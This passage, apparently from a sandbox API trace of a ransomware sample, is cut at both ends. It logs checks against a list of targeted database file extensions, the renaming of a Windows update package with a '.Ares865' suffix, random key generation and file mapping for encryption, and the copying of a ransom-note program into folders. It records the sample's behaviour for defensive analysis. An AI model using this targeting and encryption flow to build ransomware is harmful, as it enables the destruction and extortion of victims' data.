(lpString="4dl") returned 3 [0083.178] lstrcmpiW (lpString1="msu", lpString2="4dl") returned 1 [0083.178] lstrlenW (lpString="^^^") returned 3 [0083.178] lstrcmpiW (lpString1="msu", lpString2="^^^") returned 1 [0083.178] lstrlenW (lpString="abs") returned 3 [0083.178] lstrcmpiW (lpString1="msu", lpString2="abs") returned 1 [0083.178] lstrlenW (lpString="abx") returned 3 [0083.178] lstrcmpiW (lpString1="msu", lpString2="abx") returned 1 [0083.178] lstrlenW (lpString="accdb") returned 5 [0083.178] lstrcmpiW (lpString1="4.msu", lpString2="accdb") returned -1 [0083.178] lstrlenW (lpString="accdc") returned 5 [0083.178] lstrcmpiW (lpString1="4.msu", lpString2="accdc") returned -1 [0083.178] lstrlenW (lpString="accde") returned 5 [0083.178] lstrcmpiW (lpString1="4.msu", lpString2="accde") returned -1 [0083.178] lstrlenW (lpString="accdr") returned 5 [0083.178] lstrcmpiW (lpString1="4.msu", lpString2="accdr") returned -1 [0083.178] lstrlenW (lpString="accdt") returned 5 [0083.178] lstrcmpiW (lpString1="4.msu", lpString2="accdt") returned -1 [0083.178] lstrlenW (lpString="accdw") returned 5 [0083.178] lstrcmpiW (lpString1="4.msu", lpString2="accdw") returned -1 [0083.178] lstrlenW (lpString="accft") returned 5 [0083.178] lstrcmpiW (lpString1="4.msu", lpString2="accft") returned -1 [0083.178] lstrlenW (lpString="adb") returned 3 [0083.178] lstrcmpiW (lpString1="msu", lpString2="adb") returned 1 [0083.178] lstrlenW (lpString="adb") returned 3 [0083.178] lstrcmpiW (lpString1="msu", lpString2="adb") returned 1 [0083.178] lstrlenW (lpString="ade") returned 3 [0083.178] lstrcmpiW (lpString1="msu", lpString2="ade") returned 1 [0083.178] lstrlenW (lpString="adf") returned 3 [0083.178] lstrcmpiW (lpString1="msu", lpString2="adf") returned 1 [0083.178] lstrlenW (lpString="adn") returned 3 [0083.178] lstrcmpiW (lpString1="msu", lpString2="adn") returned 1 [0083.178] lstrlenW (lpString="adp") returned 3 [0083.179] lstrcmpiW (lpString1="msu", lpString2="adp") returned 1 [0083.179] lstrlenW (lpString="alf") returned 3 [0083.179] lstrcmpiW (lpString1="msu", lpString2="alf") returned 1 [0083.179] lstrlenW (lpString="ask") returned 3 [0083.179] lstrcmpiW (lpString1="msu", lpString2="ask") returned 1 [0083.179] lstrlenW (lpString="btr") returned 3 [0083.179] lstrcmpiW (lpString1="msu", lpString2="btr") returned 1 [0083.179] lstrlenW (lpString="cat") returned 3 [0083.179] lstrcmpiW (lpString1="msu", lpString2="cat") returned 1 [0083.179] lstrlenW (lpString="cdb") returned 3 [0083.179] lstrcmpiW (lpString1="msu", lpString2="cdb") returned 1 [0083.179] lstrlenW (lpString="ckp") returned 3 [0083.179] lstrcmpiW (lpString1="msu", lpString2="ckp") returned 1 [0083.179] lstrlenW (lpString="cma") returned 3 [0083.179] lstrcmpiW (lpString1="msu", lpString2="cma") returned 1 [0083.179] lstrlenW (lpString="cpd") returned 3 [0083.179] lstrcmpiW (lpString1="msu", lpString2="cpd") returned 1 [0083.179] lstrlenW (lpString="dacpac") returned 6 [0083.179] lstrcmpiW (lpString1="64.msu", lpString2="dacpac") returned -1 [0083.179] lstrlenW (lpString="dad") returned 3 [0083.179] lstrcmpiW (lpString1="msu", lpString2="dad") returned 1 [0083.179] lstrlenW (lpString="dadiagrams") returned 10 [0083.179] lstrcmpiW (lpString1="26-x64.msu", lpString2="dadiagrams") returned -1 [0083.179] lstrlenW (lpString="daschema") returned 8 [0083.179] lstrcmpiW (lpString1="-x64.msu", lpString2="daschema") returned 1 [0083.179] lstrlenW (lpString="db-journal") returned 10 [0083.179] lstrcmpiW (lpString1="26-x64.msu", lpString2="db-journal") returned -1 [0083.179] lstrlenW (lpString="db-shm") returned 6 [0083.179] lstrcmpiW (lpString1="64.msu", lpString2="db-shm") returned -1 [0083.179] lstrlenW (lpString="db-wal") returned 6 [0083.179] lstrcmpiW (lpString1="64.msu", lpString2="db-wal") returned -1 [0083.179] lstrlenW (lpString="dbc") returned 3 [0083.181] lstrcmpiW (lpString1="msu", lpString2="dbc") returned 1 [0083.181] lstrlenW (lpString="dbs") returned 3 [0083.181] lstrcmpiW (lpString1="msu", lpString2="dbs") returned 1 [0083.181] lstrlenW (lpString="dbt") returned 3 [0083.181] lstrcmpiW (lpString1="msu", lpString2="dbt") returned 1 [0083.181] lstrlenW (lpString="dbv") returned 3 [0083.181] lstrcmpiW (lpString1="msu", lpString2="dbv") returned 1 [0083.181] lstrlenW (lpString="dbx") returned 3 [0083.181] lstrcmpiW (lpString1="msu", lpString2="dbx") returned 1 [0083.182] lstrlenW (lpString="dcb") returned 3 [0083.182] lstrcmpiW (lpString1="msu", lpString2="dcb") returned 1 [0083.182] lstrlenW (lpString="dct") returned 3 [0083.182] lstrcmpiW (lpString1="msu", lpString2="dct") returned 1 [0083.182] lstrlenW (lpString="dcx") returned 3 [0083.182] lstrcmpiW (lpString1="msu", lpString2="dcx") returned 1 [0083.182] lstrlenW (lpString="ddl") returned 3 [0083.182] lstrcmpiW (lpString1="msu", lpString2="ddl") returned 1 [0083.182] lstrlenW (lpString="dlis") returned 4 [0083.182] lstrcmpiW (lpString1=".msu", lpString2="dlis") returned -1 [0083.182] lstrlenW (lpString="dp1") returned 3 [0083.182] lstrcmpiW (lpString1="msu", lpString2="dp1") returned 1 [0083.182] lstrlenW (lpString="dqy") returned 3 [0083.182] lstrcmpiW (lpString1="msu", lpString2="dqy") returned 1 [0083.184] lstrlenW (lpString="dsk") returned 3 [0083.184] lstrcmpiW (lpString1="msu", lpString2="dsk") returned 1 [0083.184] lstrlenW (lpString="dsn") returned 3 [0083.184] lstrcmpiW (lpString1="msu", lpString2="dsn") returned 1 [0083.184] lstrlenW (lpString="dtsx") returned 4 [0083.184] lstrcmpiW (lpString1=".msu", lpString2="dtsx") returned -1 [0083.184] lstrlenW (lpString="dxl") returned 3 [0083.184] lstrcmpiW (lpString1="msu", lpString2="dxl") returned 1 [0083.184] lstrlenW (lpString="eco") returned 3 [0083.184] lstrcmpiW (lpString1="msu", lpString2="eco") returned 1 [0083.184] lstrlenW (lpString="ecx") returned 3 [0083.185] lstrcmpiW (lpString1="msu", lpString2="ecx") returned 1 [0083.185] lstrlenW (lpString="edb") returned 3 [0083.188] lstrcmpiW (lpString1="msu", lpString2="edb") returned 1 [0083.190] lstrlenW (lpString="epim") returned 4 [0083.190] lstrcmpiW (lpString1=".msu", lpString2="epim") returned -1 [0083.190] lstrlenW (lpString="fcd") returned 3 [0083.190] lstrcmpiW (lpString1="msu", lpString2="fcd") returned 1 [0083.190] lstrlenW (lpString="fdb") returned 3 [0083.190] lstrcmpiW (lpString1="msu", lpString2="fdb") returned 1 [0083.190] lstrlenW (lpString="fic") returned 3 [0083.190] lstrcmpiW (lpString1="msu", lpString2="fic") returned 1 [0083.190] lstrlenW (lpString="flexolibrary") returned 12 [0083.190] lstrcmpiW (lpString1="9226-x64.msu", lpString2="flexolibrary") returned -1 [0083.190] lstrlenW (lpString="fm5") returned 3 [0083.190] lstrcmpiW (lpString1="msu", lpString2="fm5") returned 1 [0083.191] lstrlenW (lpString="fmp") returned 3 [0083.193] lstrcmpiW (lpString1="msu", lpString2="fmp") returned 1 [0083.193] lstrlenW (lpString="fmp12") returned 5 [0083.193] lstrcmpiW (lpString1="4.msu", lpString2="fmp12") returned -1 [0083.193] lstrlenW (lpString="fmpsl") returned 5 [0083.193] lstrcmpiW (lpString1="4.msu", lpString2="fmpsl") returned -1 [0083.194] lstrlenW (lpString="fol") returned 3 [0083.194] lstrcmpiW (lpString1="msu", lpString2="fol") returned 1 [0083.196] lstrlenW (lpString="fp3") returned 3 [0083.196] lstrcmpiW (lpString1="msu", lpString2="fp3") returned 1 [0083.196] lstrlenW (lpString="fp4") returned 3 [0083.196] lstrcmpiW (lpString1="msu", lpString2="fp4") returned 1 [0083.196] lstrlenW (lpString="fp5") returned 3 [0083.196] lstrcmpiW (lpString1="msu", lpString2="fp5") returned 1 [0083.196] lstrlenW (lpString="fp7") returned 3 [0083.196] lstrcmpiW (lpString1="msu", lpString2="fp7") returned 1 [0083.196] lstrlenW (lpString="fpt") returned 3 [0083.196] lstrcmpiW (lpString1="msu", lpString2="fpt") returned 1 [0083.196] lstrlenW (lpString="frm") returned 3 [0083.196] lstrcmpiW (lpString1="msu", lpString2="frm") returned 1 [0083.196] lstrlenW (lpString="gdb") returned 3 [0083.196] lstrcmpiW (lpString1="msu", lpString2="gdb") returned 1 [0083.196] lstrlenW (lpString="gdb") returned 3 [0083.196] lstrcmpiW (lpString1="msu", lpString2="gdb") returned 1 [0083.196] lstrlenW (lpString="grdb") returned 4 [0083.196] lstrcmpiW (lpString1=".msu", lpString2="grdb") returned -1 [0083.196] lstrlenW (lpString="gwi") returned 3 [0083.196] lstrcmpiW (lpString1="msu", lpString2="gwi") returned 1 [0083.196] lstrlenW (lpString="hdb") returned 3 [0083.196] lstrcmpiW (lpString1="msu", lpString2="hdb") returned 1 [0083.196] lstrlenW (lpString="his") returned 3 [0083.196] lstrcmpiW (lpString1="msu", lpString2="his") returned 1 [0083.196] lstrlenW (lpString="ib") returned 2 [0083.196] lstrcmpiW (lpString1="su", lpString2="ib") returned 1 [0083.197] lstrlenW (lpString="idb") returned 3 [0083.197] lstrcmpiW (lpString1="msu", lpString2="idb") returned 1 [0083.197] lstrlenW (lpString="ihx") returned 3 [0083.197] lstrcmpiW (lpString1="msu", lpString2="ihx") returned 1 [0083.197] lstrlenW (lpString="itdb") returned 4 [0083.197] lstrcmpiW (lpString1=".msu", lpString2="itdb") returned -1 [0083.197] lstrlenW (lpString="itw") returned 3 [0083.197] lstrcmpiW (lpString1="msu", lpString2="itw") returned 1 [0083.197] lstrlenW (lpString="jet") returned 3 [0083.197] lstrcmpiW (lpString1="msu", lpString2="jet") returned 1 [0083.197] lstrlenW (lpString="jtx") returned 3 [0083.197] lstrcmpiW (lpString1="msu", lpString2="jtx") returned 1 [0083.197] lstrlenW (lpString="kdb") returned 3 [0083.197] lstrcmpiW (lpString1="msu", lpString2="kdb") returned 1 [0083.197] lstrlenW (lpString="kexi") returned 4 [0083.197] lstrcmpiW (lpString1=".msu", lpString2="kexi") returned -1 [0083.197] lstrlenW (lpString="kexic") returned 5 [0083.197] lstrcmpiW (lpString1="4.msu", lpString2="kexic") returned -1 [0083.197] lstrlenW (lpString="kexis") returned 5 [0083.197] lstrcmpiW (lpString1="4.msu", lpString2="kexis") returned -1 [0083.197] lstrlenW (lpString="lgc") returned 3 [0083.197] lstrcmpiW (lpString1="msu", lpString2="lgc") returned 1 [0083.197] lstrlenW (lpString="lwx") returned 3 [0083.197] lstrcmpiW (lpString1="msu", lpString2="lwx") returned 1 [0083.197] lstrlenW (lpString="maf") returned 3 [0083.197] lstrcmpiW (lpString1="msu", lpString2="maf") returned 1 [0083.197] lstrlenW (lpString="maq") returned 3 [0083.197] lstrcmpiW (lpString1="msu", lpString2="maq") returned 1 [0083.197] lstrlenW (lpString="mar") returned 3 [0083.197] lstrcmpiW (lpString1="msu", lpString2="mar") returned 1 [0083.197] lstrlenW (lpString="marshal") returned 7 [0083.197] lstrcmpiW (lpString1="x64.msu", lpString2="marshal") returned 1 [0083.197] lstrlenW (lpString="mas") returned 3 [0083.197] lstrcmpiW (lpString1="msu", lpString2="mas") returned 1 [0083.197] lstrlenW (lpString="mav") returned 3 [0083.197] lstrcmpiW (lpString1="msu", lpString2="mav") returned 1 [0083.197] lstrlenW (lpString="maw") returned 3 [0083.198] lstrcmpiW (lpString1="msu", lpString2="maw") returned 1 [0083.198] lstrlenW (lpString="mdbhtml") returned 7 [0083.198] lstrcmpiW (lpString1="x64.msu", lpString2="mdbhtml") returned 1 [0083.198] lstrlenW (lpString="mdn") returned 3 [0083.198] lstrcmpiW (lpString1="msu", lpString2="mdn") returned 1 [0083.198] lstrlenW (lpString="mdt") returned 3 [0083.198] lstrcmpiW (lpString1="msu", lpString2="mdt") returned 1 [0083.198] lstrlenW (lpString="mfd") returned 3 [0083.198] lstrcmpiW (lpString1="msu", lpString2="mfd") returned 1 [0083.198] lstrlenW (lpString="mpd") returned 3 [0083.198] lstrcmpiW (lpString1="msu", lpString2="mpd") returned 1 [0083.198] lstrlenW (lpString="mrg") returned 3 [0083.198] lstrcmpiW (lpString1="msu", lpString2="mrg") returned 1 [0083.198] lstrlenW (lpString="mud") returned 3 [0083.198] lstrcmpiW (lpString1="msu", lpString2="mud") returned -1 [0083.198] lstrlenW (lpString="mwb") returned 3 [0083.198] lstrcmpiW (lpString1="msu", lpString2="mwb") returned -1 [0083.198] lstrlenW (lpString="myd") returned 3 [0083.198] lstrcmpiW (lpString1="msu", lpString2="myd") returned -1 [0083.198] lstrlenW (lpString="ndf") returned 3 [0083.198] lstrcmpiW (lpString1="msu", lpString2="ndf") returned -1 [0083.198] lstrlenW (lpString="nnt") returned 3 [0083.198] lstrcmpiW (lpString1="msu", lpString2="nnt") returned -1 [0083.198] lstrlenW (lpString="nrmlib") returned 6 [0083.198] lstrcmpiW (lpString1="64.msu", lpString2="nrmlib") returned -1 [0083.198] lstrlenW (lpString="ns2") returned 3 [0083.198] lstrcmpiW (lpString1="msu", lpString2="ns2") returned -1 [0083.198] lstrlenW (lpString="ns3") returned 3 [0083.198] lstrcmpiW (lpString1="msu", lpString2="ns3") returned -1 [0083.198] lstrlenW (lpString="ns4") returned 3 [0083.198] lstrcmpiW (lpString1="msu", lpString2="ns4") returned -1 [0083.198] lstrlenW (lpString="nsf") returned 3 [0083.198] lstrcmpiW (lpString1="msu", lpString2="nsf") returned -1 [0083.198] lstrlenW (lpString="nv") returned 2 [0083.198] lstrcmpiW (lpString1="su", lpString2="nv") returned 1 [0083.198] lstrlenW (lpString="nv2") returned 3 [0083.199] lstrcmpiW (lpString1="msu", lpString2="nv2") returned -1 [0083.199] lstrlenW (lpString="nwdb") returned 4 [0083.199] lstrcmpiW (lpString1=".msu", lpString2="nwdb") returned -1 [0083.199] lstrlenW (lpString="nyf") returned 3 [0083.199] lstrcmpiW (lpString1="msu", lpString2="nyf") returned -1 [0083.199] lstrlenW (lpString="odb") returned 3 [0083.199] lstrcmpiW (lpString1="msu", lpString2="odb") returned -1 [0083.199] lstrlenW (lpString="odb") returned 3 [0083.199] lstrcmpiW (lpString1="msu", lpString2="odb") returned -1 [0083.199] lstrlenW (lpString="oqy") returned 3 [0083.199] lstrcmpiW (lpString1="msu", lpString2="oqy") returned -1 [0083.199] lstrlenW (lpString="ora") returned 3 [0083.199] lstrcmpiW (lpString1="msu", lpString2="ora") returned -1 [0083.199] lstrlenW (lpString="orx") returned 3 [0083.199] lstrcmpiW (lpString1="msu", lpString2="orx") returned -1 [0083.199] lstrlenW (lpString="owc") returned 3 [0083.199] lstrcmpiW (lpString1="msu", lpString2="owc") returned -1 [0083.199] lstrlenW (lpString="p96") returned 3 [0083.199] lstrcmpiW (lpString1="msu", lpString2="p96") returned -1 [0083.199] lstrlenW (lpString="p97") returned 3 [0083.199] lstrcmpiW (lpString1="msu", lpString2="p97") returned -1 [0083.199] lstrlenW (lpString="pan") returned 3 [0083.199] lstrcmpiW (lpString1="msu", lpString2="pan") returned -1 [0083.199] lstrlenW (lpString="pdb") returned 3 [0083.199] lstrcmpiW (lpString1="msu", lpString2="pdb") returned -1 [0083.199] lstrlenW (lpString="pdm") returned 3 [0083.199] lstrcmpiW (lpString1="msu", lpString2="pdm") returned -1 [0083.199] lstrlenW (lpString="pnz") returned 3 [0083.199] lstrcmpiW (lpString1="msu", lpString2="pnz") returned -1 [0083.199] lstrlenW (lpString="qry") returned 3 [0083.199] lstrcmpiW (lpString1="msu", lpString2="qry") returned -1 [0083.199] lstrlenW (lpString="qvd") returned 3 [0083.199] lstrcmpiW (lpString1="msu", lpString2="qvd") returned -1 [0083.199] lstrlenW (lpString="rbf") returned 3 [0083.199] lstrcmpiW (lpString1="msu", lpString2="rbf") returned -1 [0083.199] lstrlenW (lpString="rctd") returned 4 [0083.199] lstrcmpiW (lpString1=".msu", lpString2="rctd") returned -1 [0083.200] lstrlenW (lpString="rod") returned 3 [0083.200] lstrcmpiW (lpString1="msu", lpString2="rod") returned -1 [0083.200] lstrlenW (lpString="rodx") returned 4 [0083.200] lstrcmpiW (lpString1=".msu", lpString2="rodx") returned -1 [0083.200] lstrlenW (lpString="rpd") returned 3 [0083.200] lstrcmpiW (lpString1="msu", lpString2="rpd") returned -1 [0083.200] lstrlenW (lpString="rsd") returned 3 [0083.200] lstrcmpiW (lpString1="msu", lpString2="rsd") returned -1 [0083.200] lstrlenW (lpString="sas7bdat") returned 8 [0083.200] lstrcmpiW (lpString1="-x64.msu", lpString2="sas7bdat") returned 1 [0083.200] lstrlenW (lpString="sbf") returned 3 [0083.200] lstrcmpiW (lpString1="msu", lpString2="sbf") returned -1 [0083.200] lstrlenW (lpString="scx") returned 3 [0083.200] lstrcmpiW (lpString1="msu", lpString2="scx") returned -1 [0083.200] lstrlenW (lpString="sdb") returned 3 [0083.200] lstrcmpiW (lpString1="msu", lpString2="sdb") returned -1 [0083.200] lstrlenW (lpString="sdc") returned 3 [0083.200] lstrcmpiW (lpString1="msu", lpString2="sdc") returned -1 [0083.200] lstrlenW (lpString="sdf") returned 3 [0083.200] lstrcmpiW (lpString1="msu", lpString2="sdf") returned -1 [0083.200] lstrlenW (lpString="sis") returned 3 [0083.200] lstrcmpiW (lpString1="msu", lpString2="sis") returned -1 [0083.200] lstrlenW (lpString="spq") returned 3 [0083.200] lstrcmpiW (lpString1="msu", lpString2="spq") returned -1 [0083.200] lstrlenW (lpString="te") returned 2 [0083.200] lstrcmpiW (lpString1="su", lpString2="te") returned -1 [0083.200] lstrlenW (lpString="teacher") returned 7 [0083.200] lstrcmpiW (lpString1="x64.msu", lpString2="teacher") returned 1 [0083.200] lstrlenW (lpString="tmd") returned 3 [0083.200] lstrcmpiW (lpString1="msu", lpString2="tmd") returned -1 [0083.200] lstrlenW (lpString="tps") returned 3 [0083.200] lstrcmpiW (lpString1="msu", lpString2="tps") returned -1 [0083.200] lstrlenW (lpString="trc") returned 3 [0083.200] lstrcmpiW (lpString1="msu", lpString2="trc") returned -1 [0083.200] lstrlenW (lpString="trc") returned 3 [0083.200] lstrcmpiW (lpString1="msu", lpString2="trc") returned -1 [0083.200] lstrlenW (lpString="trm") returned 3 [0083.201] lstrcmpiW (lpString1="msu", lpString2="trm") returned -1 [0083.201] lstrlenW (lpString="udb") returned 3 [0083.201] lstrcmpiW (lpString1="msu", lpString2="udb") returned -1 [0083.201] lstrlenW (lpString="udl") returned 3 [0083.201] lstrcmpiW (lpString1="msu", lpString2="udl") returned -1 [0083.201] lstrlenW (lpString="usr") returned 3 [0083.201] lstrcmpiW (lpString1="msu", lpString2="usr") returned -1 [0083.201] lstrlenW (lpString="v12") returned 3 [0083.201] lstrcmpiW (lpString1="msu", lpString2="v12") returned -1 [0083.201] lstrlenW (lpString="vis") returned 3 [0083.201] lstrcmpiW (lpString1="msu", lpString2="vis") returned -1 [0083.201] lstrlenW (lpString="vpd") returned 3 [0083.201] lstrcmpiW (lpString1="msu", lpString2="vpd") returned -1 [0083.201] lstrlenW (lpString="vvv") returned 3 [0083.201] lstrcmpiW (lpString1="msu", lpString2="vvv") returned -1 [0083.201] lstrlenW (lpString="wdb") returned 3 [0083.201] lstrcmpiW (lpString1="msu", lpString2="wdb") returned -1 [0083.201] lstrlenW (lpString="wmdb") returned 4 [0083.201] lstrcmpiW (lpString1=".msu", lpString2="wmdb") returned -1 [0083.201] lstrlenW (lpString="wrk") returned 3 [0083.201] lstrcmpiW (lpString1="msu", lpString2="wrk") returned -1 [0083.201] lstrlenW (lpString="xdb") returned 3 [0083.201] lstrcmpiW (lpString1="msu", lpString2="xdb") returned -1 [0083.201] lstrlenW (lpString="xld") returned 3 [0083.201] lstrcmpiW (lpString1="msu", lpString2="xld") returned -1 [0083.201] lstrlenW (lpString="xmlff") returned 5 [0083.201] lstrcmpiW (lpString1="4.msu", lpString2="xmlff") returned -1 [0083.201] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu.Ares865") returned 129 [0083.201] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu" (normalized: "c:\\users\\all users\\package cache\\42d5bec7ddfbd49e76467529cbc2868987bf8460\\packages\\patch\\x64\\windows6.1-kb2999226-x64.msu"), lpNewFileName="C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu.Ares865" (normalized: "c:\\users\\all users\\package cache\\42d5bec7ddfbd49e76467529cbc2868987bf8460\\packages\\patch\\x64\\windows6.1-kb2999226-x64.msu.ares865"), dwFlags=0x1) returned 1 [0083.203] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu.Ares865" (normalized: "c:\\users\\all users\\package cache\\42d5bec7ddfbd49e76467529cbc2868987bf8460\\packages\\patch\\x64\\windows6.1-kb2999226-x64.msu.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0083.203] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1012025) returned 1 [0083.203] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0083.203] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0083.203] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0083.203] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0083.204] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0083.204] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0083.205] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xf7440, lpName=0x0) returned 0x15c [0083.210] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xf7440) returned 0xdd0000 [0083.279] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0083.280] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0083.280] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0083.280] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0083.280] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0083.280] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0083.280] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0083.280] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0083.280] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0083.280] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0083.280] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0083.280] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0083.281] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0083.281] UnmapViewOfFile (lpBaseAddress=0xdd0000) returned 1 [0083.289] CloseHandle (hObject=0x15c) returned 1 [0083.289] CloseHandle (hObject=0x118) returned 1 [0083.290] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0083.290] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0083.290] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0083.294] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59d2100, ftCreationTime.dwHighDateTime=0x1d0a100, ftLastAccessTime.dwLowDateTime=0x59d2100, ftLastAccessTime.dwHighDateTime=0x1d0a100, ftLastWriteTime.dwLowDateTime=0x59d2100, ftLastWriteTime.dwHighDateTime=0x1d0a100, nFileSizeHigh=0x0, nFileSizeLow=0xf7139, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows6.1-KB2999226-x64.msu", cAlternateFileName="WINDOW~1.MSU")) returned 0 [0083.294] FindClose (in: hFindFile=0x2cd0e8 | out: hFindFile=0x2cd0e8) returned 1 [0083.294] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7b50 [0083.294] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Oracle", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Oracle") returned="C:\\Users\\All Users\\Oracle" [0083.294] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0a8 | out: hHeap=0x2b0000) returned 1 [0083.294] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b48 | out: hHeap=0x2b0000) returned 1 [0083.294] lstrlenW (lpString="C:\\Users\\All Users\\Oracle") returned 25 [0083.294] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Oracle" | out: lpString1="C:\\Users\\All Users\\Oracle") returned="C:\\Users\\All Users\\Oracle" [0083.294] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0083.294] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Oracle\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\oracle\\how to back your files.exe"), bFailIfExists=1) returned 0 [0083.295] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0083.295] GetLastError () returned 0x0 [0083.295] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0083.296] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0083.296] CloseHandle (hObject=0x120) returned 1 [0083.296] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0083.296] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0083.296] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Oracle\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7e3c6d00, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x4c2efc20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c2efc20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0a8 [0083.296] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0083.296] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0083.296] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0083.296] FindNextFileW (in: hFindFile=0x2cd0a8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7e3c6d00, ftCreationTime.dwHighDateTime=0x1d2e627, 